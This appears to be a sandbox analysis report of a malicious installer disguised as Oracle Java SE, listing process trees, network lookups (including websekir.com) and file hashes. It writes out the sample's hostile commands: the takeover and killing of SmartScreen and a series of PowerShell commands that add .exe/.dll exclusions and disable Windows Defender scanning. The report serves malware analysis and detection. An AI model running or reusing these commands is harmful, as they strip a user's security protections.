PID 3876 wrote to memory of 1800 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 1800 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 2472 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 2472 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 2472 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 4824 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3876 wrote to memory of 4824 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3876 wrote to memory of 4824 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4824 wrote to memory of 5080 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 5080 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 5080 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 1672 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 1672 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 1672 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 2528 N/A C:\Windows\syswow64\cmd.exe C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
PID 3876 wrote to memory of 2528 N/A C:\Windows\syswow64\cmd.exe C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
PID 3876 wrote to memory of 2528 N/A C:\Windows\syswow64\cmd.exe C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
PID 3876 wrote to memory of 4056 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 4056 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 4056 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 5016 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 5016 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 5016 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 4600 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 4600 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 4600 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 932 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 932 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 932 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 3140 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 3140 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 3140 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 3580 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 3580 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 3580 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 3460 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 3460 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 3460 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 4556 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 4556 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 4556 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 4328 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 674D0B963080012894E3DF4CB73C27AF

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 30B3AA91DCE7877DF4C02F3D55173702 E Global\MSI0000

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe

"C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe"

C:\Windows\syswow64\cmd.exe

"cmd.exe" /C "C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat"

C:\Windows\SysWOW64\takeown.exe

takeown /f "C:\Windows\System32\smartscreen.exe" /a

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\System32\smartscreen.exe" /reset

C:\Windows\SysWOW64\taskkill.exe

taskkill /im smartscreen.exe /f

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionExtension ".dll""

C:\Windows\SysWOW64\cmd.exe

cmd /c powershell.exe -command "Set-MpPreference -MAPSReporting 0"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -MAPSReporting 0"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -PUAProtection disable"

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe

Register.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 repository.certum.pl udp
GB 2.18.63.21:80 repository.certum.pl tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.63.18.2.in-addr.arpa udp
US 8.8.8.8:53 5.63.18.2.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 websekir.com udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 websekir.com udp
US 8.8.8.8:53 websekir.com udp
US 8.8.8.8:53 websekir.com udp
N/A 127.0.0.1:50543 tcp
N/A 127.0.0.1:50551 tcp
N/A 127.0.0.1:50553 tcp
N/A 127.0.0.1:50556 tcp
US 8.8.8.8:53 websekir.com udp
N/A 127.0.0.1:50559 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp

Files

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6C27B6DA8C60D333DD161137481B772E_8D2705640D941B859369EC71AB80665B

MD5 3d3ac8653b5eeb7eaba019b50df5f3d0
SHA1 57dfe18b28a76cfadb4cc80f53d559cf8868728d
SHA256 e7a9369455a1f1f355faf65b0bb322ffc40741d19df44b2a982cd69f0322709a
SHA512 8d37b115a91b960ce47504e03bff45ae6bbdf1cec782cf6a69ea348fb91845adda04761a067d26df36ba322b4d784bf7ee2fac76db9cc5334db14e3059d6458c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6C27B6DA8C60D333DD161137481B772E_8D2705640D941B859369EC71AB80665B

MD5 e8506a7a82d6d66cb76937576ae2eda7
SHA1 a3cb771a9a410caaf4e9bb527d02254d41d3169d
SHA256 eb33b432e411b73f127bac67178fd05c9336fcf444973c8e8dcf997fc711bd7d
SHA512 8eea374485b45af2b50870ee58fd91b7275e050782df5c506e91d3e77c77e68dabf1bbc970d6ddc35a4fc1ea8d4d93900954b64e2303d471354305d2089ae12b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\68FAF71AF355126BCA00CE2E73CC7374_2FC60472190717C9030A3B22E7C17DF4

MD5 7fa35b9b26d35986602214ca1a5a8123
SHA1 300297298df1d3bd5b5c0c1c5bb782132bc98df2
SHA256 70497b384024f1c0d6950a75f41cfed50292ac8408cd47b47e04b7c375358486
SHA512 df5edae4399b49fc522a54f5e3cfc287dce17cf3d66103d361f56fd289894dfde258b42266e5837505ef1ea9ab440625129ebfafd41775a32652837014190da6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\68FAF71AF355126BCA00CE2E73CC7374_2FC60472190717C9030A3B22E7C17DF4

MD5 d67d0ea2202bf0994c7d74e568bb241d
SHA1 1aa2f3b799b490e5ec7d538995d7e459094134eb
SHA256 afe0fcf076f4a87deac1a79d1624f7d5bcf2fd79168eb073ddfd8128c77f6802
SHA512 48f4ef76389f47ba5404edfad362236185a5edfecb772f520078d1554daab797dac97f432a2367895e81d1da63a8ba3d3c075fca704f55dc9780af300e9e84fb

C:\Windows\Installer\MSI77C1.tmp

MD5 a3ae5d86ecf38db9427359ea37a5f646
SHA1 eb4cb5ff520717038adadcc5e1ef8f7c24b27a90
SHA256 c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74
SHA512 96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe

MD5 a27bdbc102aa90a99bc5538bb271b4d3
SHA1 eb18ea9eee793aa76eab49feea0e6490c4ded61e
SHA256 e85b4b2991b3772ab7bfaf0012fe5dfd754fd0c3661466e556b20f5ca8f2b4de
SHA512 cc0cbdc74b419a77f8250cd80f68af5b227383ee904707187b8971d3ed478cb80edcf7ab27390e34be65b599fb214925577afecc6e82d41db9000c50f71da421

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140.dll

MD5 e008fbfdea1bf873f3d94d74c1cf7935
SHA1 2a2af5e9084e7b55cdd5d01df342b02c1917573c
SHA256 678f9d715220512a823ca45d7e8545a1288728d8d47243e072e17049441cdd2b
SHA512 145acb67ab06dc90e5c7ed89623a339f595998af683bf47d665ffa23b05f9b87016b3ae5777c2c45f53b91a757e510b0f5aa5a9b908d79df3d566b2307d9d3d0

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140_1.dll

MD5 1e109b1d40efcfec81a5d43d318cbb26
SHA1 03aae193dc36d70fb34257d1276666e988b4a222
SHA256 0f04b4cb12543687d8416dfc307593a1dbc450939fd7980d124fed4144732d69
SHA512 762bb0fa8528936c8cfbd05e8beb557b9d751f3850124b3dcec102e3cd55550408666ffb27fea5472420ea40d95453279769765eee8f94ed2afa3d721018e1c4

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\MSVCP140.dll

MD5 9dda681b0406c3575e666f52cbde4f80
SHA1 1951c5b2c689534cdc2fbfbc14abbf9600a66086
SHA256 1ecd899f18b58a7915069e17582b8bf9f491a907c3fdf22b1ba1cbb2727b69b3
SHA512 753d0af201d5c91b50e7d1ed54f44ee3c336f8124ba7a5e86b53836df520eb2733b725b877f83fda6a9a7768379b5f6fafa0bd3890766b4188ebd337272e9512

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll

MD5 888aa12cc20f645dd2fc04f52e453bc6
SHA1 b19e790c9e6ceface9cdd41a24518d6e4a953b23
SHA256 93e2aa20251e1a0485828c3e29b60e17ff2f3ec1285455d059ffe1b1a24518eb
SHA512 f7d7a67244ff4f9a269461b49cdcd44d923840154447ca7ace61ef8167b79605c2f3c29a1d607b44831e68a696ef219710c4f1658a6fa73e564b7f252b031dc3

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll

MD5 b3c188281aa3998f49391da0c3b52b8e
SHA1 67e6f1eb07861dddde3df9d266f683cb0331d433
SHA256 59481427f4dad6460ac60c7619f628d6b7fad33562bbd8dc9145715ebb300e46
SHA512 42d7a71d4ce1e0c6ea50ddbf960b6f0d25b32526604295f50688bf4770db7338d4b32f0dda738ae147def66788497537f708becdeb720e299c614c28fe824665

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat

MD5 0a16033c7df6ba580e33c66fed1a12d7
SHA1 50fc0b9f740a9e82717f2370fe0a15e937a84208
SHA256 08d68557b06a5cb43ce2719bf82dd2fee6bd78a58c88a37e5ee5d54b2ea14623
SHA512 c252e11099d52bc57bd49ce5732a7cd5fcbd155b36e0b0b27a3e8a3023949708362e4156e09f467b35c27543a652173a8dbe29da13dbdb23ecd2354c95569b44

memory/1800-84-0x0000000003110000-0x0000000003146000-memory.dmp

memory/5080-85-0x0000000004FB0000-0x00000000055D8000-memory.dmp

memory/2472-86-0x00000000057A0000-0x00000000057C2000-memory.dmp

memory/5080-88-0x0000000005750000-0x00000000057B6000-memory.dmp

memory/5080-87-0x00000000055E0000-0x0000000005646000-memory.dmp

memory/5080-89-0x0000000005870000-0x0000000005BC4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rixc2b3o.31x.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2472-117-0x0000000006870000-0x000000000688E000-memory.dmp

memory/2472-118-0x0000000006890000-0x00000000068DC000-memory.dmp

memory/2472-121-0x0000000070740000-0x000000007078C000-memory.dmp

memory/5080-119-0x0000000006E90000-0x0000000006EC2000-memory.dmp

memory/5080-120-0x0000000070740000-0x000000007078C000-memory.dmp

memory/2472-140-0x0000000006DF0000-0x0000000006E0E000-memory.dmp

memory/5080-141-0x00000000070D0000-0x0000000007173000-memory.dmp

memory/1800-142-0x0000000070740000-0x000000007078C000-memory.dmp

memory/5080-152-0x00000000071F0000-0x000000000720A000-memory.dmp

memory/1800-153-0x0000000008040000-0x00000000086BA000-memory.dmp

memory/5080-154-0x0000000007260000-0x000000000726A000-memory.dmp

memory/1800-155-0x0000000007C90000-0x0000000007D26000-memory.dmp

memory/5080-157-0x00000000073F0000-0x0000000007401000-memory.dmp

memory/1800-156-0x0000000007C00000-0x0000000007C11000-memory.dmp

memory/2472-158-0x0000000007DC0000-0x0000000007DCE000-memory.dmp

memory/5080-159-0x0000000007430000-0x0000000007444000-memory.dmp

memory/5080-160-0x0000000007530000-0x000000000754A000-memory.dmp

memory/1800-161-0x0000000007C80000-0x0000000007C88000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 88b7e09ad647110c38f12c0d75b4f5c8
SHA1 b2e188fd69562cf30374f3d8e4b5f56ff3cd9ca5
SHA256 68262db03eb3905e7225b3863eeef9307c5a81a656053706bcca06d8658be296
SHA512 f9a933492b047d14dcab6a9bd6864b668b36c2ef133bed5ff47ed5b9d59745b172293b96736c71860f64aafd9f44ce1fcffd1ed5b0b7b27b97bd0f05f56192e2

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe

MD5 96b62cfb83cf0e9790a3ef939173ee31
SHA1 23ecaefa21524e9446ea16e1f532f8bf9c5a56f1
SHA256 6fe23163ea43ab8d9e84fed45b8590fe643d599c7f218ea05d505e3aeea86f23
SHA512 d018997c50702fe035bd3974180f274ffa34605bd19a3ce8fbabf96633794afe8f1ee4a2ee731a9ff3c73163e45ad26f8d7bac30b9ae55d1d47c8a333b657b6b

memory/1672-192-0x0000000005C10000-0x0000000005F64000-memory.dmp

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll

MD5 a3ba8128253c2f6bf043d636100d62de
SHA1 f47a211b1d09d75ff820d2c2e2fd9fa0338562a5
SHA256 599f9c72db7ba72b2d13c222f9121d7b564fbd0b401be44bd05a660e43d93bce
SHA512 89f2d39a507a40bbf096fd10816b901c472ce5b184b7de70d9d80c97f42db5029e877201df7abd828c4f475d279617d4e24b673608136659a9602cf14385f5ae

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll

MD5 e7fcab954f116c8bb4b006145c20dd23
SHA1 91ee70a33ab12618f0f0ec229de4583d9aa52a8a
SHA256 e52b21f458c61dab957fea7286544a0c6531a4caf5c97c323eea10a61a0b38b2
SHA512 d5cf56a35697b4afd88721f7c60156fd5b1ef7b659e8fe5e98db79f8fa41b394662bc4182b41af1a5a029ec3b04c909629db83d146683ca382958199f6ea73b9

memory/4600-280-0x0000000006300000-0x000000000634C000-memory.dmp

memory/548-335-0x00007FFBF8C90000-0x00007FFBF9110000-memory.dmp

memory/4600-336-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/4600-346-0x00000000074A0000-0x0000000007543000-memory.dmp

memory/1672-347-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/932-367-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/5016-357-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/3140-377-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/4056-387-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/4556-397-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/3588-417-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/3580-407-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/3460-427-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/4328-437-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/4600-447-0x00000000077E0000-0x00000000077F1000-memory.dmp

memory/3812-448-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/4764-458-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/3484-468-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/4600-478-0x0000000007820000-0x0000000007834000-memory.dmp

memory/4420-479-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/4016-489-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/2128-499-0x00000000700D0000-0x000000007011C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 88e30f8e14dda84b7e420941eb5cfd08
SHA1 999c1236d43e908c42e35fdad6a0cbeca0b5c87a
SHA256 b9d45f7479e06d6dcb02482467726fbc43aa738e0605ccc1bd428717fd27c464
SHA512 a009d8266681fd55714e0fe777f9ca3f4be5c0223971deb886b80582c7398231d22bacd2fd970b3348484b986a081ffa839fdb7454a96a9c6f0fb01ca4eef709

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d835855d729ed0ea8515fc7680f8a68b
SHA1 5fe84e9ca05c87c5fa0584498a95c3ab9234e446
SHA256 767ae12a1249e356d5597ac96c80c4df7bcf696214dca6536e0d750c5ce532c3
SHA512 8af7c6179595fd252067f2de18ec4823062951128590a44769477a880c0e14334dc394be85e6ec2ead5bf43936aec34f81447b542081a99a1a32a42082ffe1a3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bc1847cefc1c9c27c95ecd59857d21ac
SHA1 0c756ee8194aca441ef3d2d24017fa9f20176cb9
SHA256 76d940812fbb29a2153bdcf5ca23b6ce4bccca7a0697603823ee32d916f3d9d5
SHA512 d9110155f8f55a3e4bee18ea12b97a15cfec12fb38ab6c643f36d370e0e123811366476b1217b82b248e5ccc0f5bee98376ca33afd2693d9d34dda3ba5f5c9d0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b98526874008796c30f2b4d0d16e0351
SHA1 2a4707b0c18155f53c773c0fba8fab4d323c2c6a
SHA256 f62c5b49cbe710a5ef1ccd22ef8a42b380eb2588ae58088ba6fbb1360001ea5f
SHA512 36f58b3729a07f5cab2f3a2396fdd2fba732a12bc7136104d41d5b6a295b80684259278f891182c9096c84ab095977d1d082e685dfd0d7099dce02cc92ce3ac6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e49232bfd9248f8c4bb9291af3127f26
SHA1 dee61b7b2713003137e0db037c5c49494c6c4272
SHA256 5af059663a12adb9b84cb82ef4520b8b77cce39e50d73bfbe0325babe79d16b8
SHA512 a248b49b18c26b614313f94d067cd61965dadb105163f5812557aac467ba39752d629b24c6493c914c7a463a1d23fbdaa331ff4a1d798974a51ac30dc274a0f2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 90de5738b9e946ce68a2d67e66b45f58
SHA1 15ab9e70b2da772985ba674513ff40251b62799e
SHA256 227fc3c051f3b3dd07bde413f195d701b63a627965c2003d55b8d3ddef950bdc
SHA512 98bbc30ab336b5e1e85ae108e518b3e598859f1033a3a8ae07340fb14f89af02cf52e9a06d281341eaebe47ff6ea16d50e35b306fb398684a3788ae97bf2299c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 92d7d23566905f49a00fe9bd39dd8426
SHA1 83cfc3f1449b54d21cbdd394723ca4e6a4b6a355
SHA256 9eb45000e73503d1ba9b2af51e5216f82b92321b03c2150b5a7f85fbd6f8ef3f
SHA512 c47d257a916028a2e137446ae3429337eafc69056504006cb0b9d298feedd19b974eb2c88f02e17dc2119d6bd0f2c1f9bc11d8a022875a9c573f344dcfa73d3e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6eef5e45356ecff70dbfaf70af0c41a4
SHA1 e7bfa64975d94696213799d7aa630739ef9fed68
SHA256 683670fb625bcdd08dbfde6ed96440363959a632bf6249b3853de37620bc5555
SHA512 d00498eb7b198bfa0a1528ad8572b46839413681516a3929929a7af122b870d115dd49edc1d77cf19a95683ea6a0e1cacdeabebecfaec0ac105928886874cab0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f853d6d0fe869dc52d9c5d7873c8219c
SHA1 2805083671f9bc4453de07781d737a5bf45e60e5
SHA256 66945f8b460f9025d5f58ca90bd8b976d41c2f42cba58845feaa78643cefbbec
SHA512 4fcf31aa3a393d9c0ee7dc08bfa3c62bf0862bea1f88b0f3a2286f5293e9e9ed5eeb9a9896f1251fa641080c6ad918b1d2e4e5c0d21b3cc1b94c0b7ed650bd0e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 82111a2f1b6833e37602df207a7bc189
SHA1 19ced181f471d749cc98a303685558bd284155d9
SHA256 a79ba5594439c89db758b486786fc0420184e5f8ec304407173a5dad80aaea46
SHA512 b602b8e53b156d157ad288a12c6d5eba950f5907ea76b4fad6952f27867c2a2118c51c501e0ad1f0477dd07842b989435dc676490bea9bafdcbe9359ee77af97

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d63604e13936ee1e7baa922de6e2524f
SHA1 619478385fb76193a111ea5e2cbda66ea88494bf
SHA256 705e89249150d5cd31bc3b8f5b59527c4962b575d6dedc6429f2f52e2b9d76fe
SHA512 ce64bf0cf7d2660a6e3b344e7176e74c44c12434fbe35ddf764b6980cf38c0222cb8afca1a44a4b1ad78274f263a5404d219cecebab6a194e5b9a382f568c367

C:\Config.Msi\e57762b.rbs

MD5 3064ebd622bb0cec063dfec93c469a92
SHA1 5cc25618f16e07a21ff01422bd63fb2d66ef560c
SHA256 de11bf9c53921ba2f588cf9e9808b01761b2a5b03de2dbae238dc04fa7e8a7f2
